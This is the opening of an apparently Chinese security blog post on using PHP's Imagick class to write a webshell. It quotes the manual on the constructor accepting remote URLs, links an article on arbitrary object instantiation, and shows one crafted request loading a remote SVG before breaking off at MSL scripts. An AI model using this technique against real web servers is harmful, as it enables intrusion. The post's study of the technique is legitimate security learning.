imagickd写shell的技术学习

文章预览

前言 没想到吧哥们，imagickd也能写shell，真是学到了不少，下面会具体分析是如何写shell的 基础知识 Imagick 类 参考官方手册https://www.php.net/manual/zh/class.imagick.php 重点关注他的构造方法 (PECL imagick 2, PECL imagick 3) Imagick::__construct — The Imagick constructor 关注一下参数 files The path to an image to load or an array of paths. Paths can include wildcards for file names, or can be URLs. 就是能够加载图片，甚至可以是远程的图片 我们尝试一手，当然我这里就不尝试了，因为这还不是重点，给个连接 https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/ 原作者是这样说的 我测试了它是否  Imagick::__construct  接受远程方案并且可以通过 HTTP 连接到我的主机： 可以看到是可以的 我们自己尝试一下，首先构造如下的请求 http://192.168.177.146:8080/?a=Imagick =http://ip/test.svg MSL脚本语言 可以参考一下官 ………………………………